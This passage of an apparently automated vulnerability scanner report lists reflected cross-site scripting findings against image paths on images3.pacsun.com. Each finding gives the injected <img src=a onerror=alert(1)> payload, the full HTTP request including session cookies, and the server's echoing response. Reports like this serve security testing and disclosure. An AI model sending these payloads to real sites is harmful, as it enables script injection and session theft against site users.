Connection: close

Unable to find /pacsun/AC_close_052110de589<img src=a onerror=alert(1)>0d8ae2ced7c

3.20. http://images3.pacsun.com/is/image/pacsun/FSO_093011 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/FSO_093011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a4e3<img%20src%3da%20onerror%3dalert(1)>2ed1c13b337 was submitted in the REST URL parameter 4. This input was echoed as 8a4e3<img src=a onerror=alert(1)>2ed1c13b337 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/FSO_0930118a4e3<img%20src%3da%20onerror%3dalert(1)>2ed1c13b337?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 77
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:05 GMT
Connection: close

Unable to find /pacsun/FSO_0930118a4e3<img src=a onerror=alert(1)>2ed1c13b337

3.21. http://images3.pacsun.com/is/image/pacsun/FSO_popup_093011 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/FSO_popup_093011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 54169<img%20src%3da%20onerror%3dalert(1)>14dae13a434 was submitted in the REST URL parameter 4. This input was echoed as 54169<img src=a onerror=alert(1)>14dae13a434 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/FSO_popup_09301154169<img%20src%3da%20onerror%3dalert(1)>14dae13a434?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 83
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:09 GMT
Connection: close

Unable to find /pacsun/FSO_popup_09301154169<img src=a onerror=alert(1)>14dae13a434

3.22. http://images3.pacsun.com/is/image/pacsun/brandLogo_321 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brandLogo_321

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8c84<img%20src%3da%20onerror%3dalert(1)>76ce5578b56 was submitted in the REST URL parameter 4. This input was echoed as a8c84<img src=a onerror=alert(1)>76ce5578b56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brandLogo_321a8c84<img%20src%3da%20onerror%3dalert(1)>76ce5578b56?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:58 GMT
Connection: close

Unable to find /pacsun/brandLogo_321a8c84<img src=a onerror=alert(1)>76ce5578b56

3.23. http://images3.pacsun.com/is/image/pacsun/brandScrollButLeft [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brandScrollButLeft

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f184<img%20src%3da%20onerror%3dalert(1)>54ec4aa3fa6 was submitted in the REST URL parameter 4. This input was echoed as 1f184<img src=a onerror=alert(1)>54ec4aa3fa6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brandScrollButLeft1f184<img%20src%3da%20onerror%3dalert(1)>54ec4aa3fa6?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:43 GMT
Connection: close

Unable to find /pacsun/brandScrollButLeft1f184<img src=a onerror=alert(1)>54ec4aa3fa6

3.24. http://images3.pacsun.com/is/image/pacsun/brandScrollButRight [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brandScrollButRight

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 22c96<img%20src%3da%20onerror%3dalert(1)>85ffdcff86d was submitted in the REST URL parameter 4. This input was echoed as 22c96<img src=a onerror=alert(1)>85ffdcff86d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brandScrollButRight22c96<img%20src%3da%20onerror%3dalert(1)>85ffdcff86d?$img_gif$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; mbox=check#true#1317384269|session#1317384208243-106173#1317386069|PC#1317384208243-106173.19#1318593819; fsr.a=1317384219407

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 86
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:44 GMT
Connection: close

Unable to find /pacsun/brandScrollButRight22c96<img src=a onerror=alert(1)>85ffdcff86d

3.25. http://images3.pacsun.com/is/image/pacsun/brand_logo002 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo002

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 71350<img%20src%3da%20onerror%3dalert(1)>69a1cd2b9d4 was submitted in the REST URL parameter 4. This input was echoed as 71350<img src=a onerror=alert(1)>69a1cd2b9d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo00271350<img%20src%3da%20onerror%3dalert(1)>69a1cd2b9d4?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:58 GMT
Connection: close

Unable to find /pacsun/brand_logo00271350<img src=a onerror=alert(1)>69a1cd2b9d4

3.26. http://images3.pacsun.com/is/image/pacsun/brand_logo003 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo003

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ecc70<img%20src%3da%20onerror%3dalert(1)>580250d2dd7 was submitted in the REST URL parameter 4. This input was echoed as ecc70<img src=a onerror=alert(1)>580250d2dd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo003ecc70<img%20src%3da%20onerror%3dalert(1)>580250d2dd7?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/brand_logo003ecc70<img src=a onerror=alert(1)>580250d2dd7

3.27. http://images3.pacsun.com/is/image/pacsun/brand_logo004 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo004

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4349<img%20src%3da%20onerror%3dalert(1)>1d1ac9815d3 was submitted in the REST URL parameter 4. This input was echoed as e4349<img src=a onerror=alert(1)>1d1ac9815d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo004e4349<img%20src%3da%20onerror%3dalert(1)>1d1ac9815d3?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:01 GMT
Connection: close

Unable to find /pacsun/brand_logo004e4349<img src=a onerror=alert(1)>1d1ac9815d3

3.28. http://images3.pacsun.com/is/image/pacsun/brand_logo005 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo005

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ac27d<img%20src%3da%20onerror%3dalert(1)>238586c1107 was submitted in the REST URL parameter 4. This input was echoed as ac27d<img src=a onerror=alert(1)>238586c1107 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo005ac27d<img%20src%3da%20onerror%3dalert(1)>238586c1107?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:00 GMT
Connection: close

Unable to find /pacsun/brand_logo005ac27d<img src=a onerror=alert(1)>238586c1107

3.29. http://images3.pacsun.com/is/image/pacsun/brand_logo006 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo006

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52977<img%20src%3da%20onerror%3dalert(1)>af894da79fc was submitted in the REST URL parameter 4. This input was echoed as 52977<img src=a onerror=alert(1)>af894da79fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo00652977<img%20src%3da%20onerror%3dalert(1)>af894da79fc?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/brand_logo00652977<img src=a onerror=alert(1)>af894da79fc

3.30. http://images3.pacsun.com/is/image/pacsun/brand_logo007 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo007

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 755a4<img%20src%3da%20onerror%3dalert(1)>e9fdd65a692 was submitted in the REST URL parameter 4. This input was echoed as 755a4<img src=a onerror=alert(1)>e9fdd65a692 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo007755a4<img%20src%3da%20onerror%3dalert(1)>e9fdd65a692?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:00 GMT
Connection: close

Unable to find /pacsun/brand_logo007755a4<img src=a onerror=alert(1)>e9fdd65a692

3.31. http://images3.pacsun.com/is/image/pacsun/brand_logo008 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo008

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83cda<img%20src%3da%20onerror%3dalert(1)>302fb0df51c was submitted in the REST URL parameter 4. This input was echoed as 83cda<img src=a onerror=alert(1)>302fb0df51c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo00883cda<img%20src%3da%20onerror%3dalert(1)>302fb0df51c?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:00 GMT
Connection: close

Unable to find /pacsun/brand_logo00883cda<img src=a onerror=alert(1)>302fb0df51c

3.32. http://images3.pacsun.com/is/image/pacsun/brand_logo009 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo009

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcef3<img%20src%3da%20onerror%3dalert(1)>acb8607ef78 was submitted in the REST URL parameter 4. This input was echoed as dcef3<img src=a onerror=alert(1)>acb8607ef78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo009dcef3<img%20src%3da%20onerror%3dalert(1)>acb8607ef78?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:02 GMT
Connection: close

Unable to find /pacsun/brand_logo009dcef3<img src=a onerror=alert(1)>acb8607ef78

3.33. http://images3.pacsun.com/is/image/pacsun/brand_logo010 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo010

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8fd5d<img%20src%3da%20onerror%3dalert(1)>e5d3540ef89 was submitted in the REST URL parameter 4. This input was echoed as 8fd5d<img src=a onerror=alert(1)>e5d3540ef89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo0108fd5d<img%20src%3da%20onerror%3dalert(1)>e5d3540ef89?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:01 GMT
Connection: close

Unable to find /pacsun/brand_logo0108fd5d<img src=a onerror=alert(1)>e5d3540ef89

3.34. http://images3.pacsun.com/is/image/pacsun/brand_logo011 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 75176<img%20src%3da%20onerror%3dalert(1)>82dc671c0f8 was submitted in the REST URL parameter 4. This input was echoed as 75176<img src=a onerror=alert(1)>82dc671c0f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo01175176<img%20src%3da%20onerror%3dalert(1)>82dc671c0f8?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:02 GMT
Connection: close

Unable to find /pacsun/brand_logo01175176<img src=a onerror=alert(1)>82dc671c0f8

3.35. http://images3.pacsun.com/is/image/pacsun/brand_logo012 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo012

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2b456<img%20src%3da%20onerror%3dalert(1)>3ef34cddc25 was submitted in the REST URL parameter 4. This input was echoed as 2b456<img src=a onerror=alert(1)>3ef34cddc25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo0122b456<img%20src%3da%20onerror%3dalert(1)>3ef34cddc25?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:02 GMT
Connection: close

Unable to find /pacsun/brand_logo0122b456<img src=a onerror=alert(1)>3ef34cddc25

3.36. http://images3.pacsun.com/is/image/pacsun/brand_logo013 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo013

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 26bb8<img%20src%3da%20onerror%3dalert(1)>4f418de10fa was submitted in the REST URL parameter 4. This input was echoed as 26bb8<img src=a onerror=alert(1)>4f418de10fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo01326bb8<img%20src%3da%20onerror%3dalert(1)>4f418de10fa?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:04 GMT
Connection: close

Unable to find /pacsun/brand_logo01326bb8<img src=a onerror=alert(1)>4f418de10fa

3.37. http://images3.pacsun.com/is/image/pacsun/brand_logo014 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo014

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c5e3e<img%20src%3da%20onerror%3dalert(1)>af792a1d8d2 was submitted in the REST URL parameter 4. This input was echoed as c5e3e<img src=a onerror=alert(1)>af792a1d8d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/brand_logo014c5e3e<img%20src%3da%20onerror%3dalert(1)>af792a1d8d2?$img_png$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 80
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:02 GMT
Connection: close

Unable to find /pacsun/brand_logo014c5e3e<img src=a onerror=alert(1)>af792a1d8d2

3.38. http://images3.pacsun.com/is/image/pacsun/brand_logo015 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/brand_logo015

Issue detail

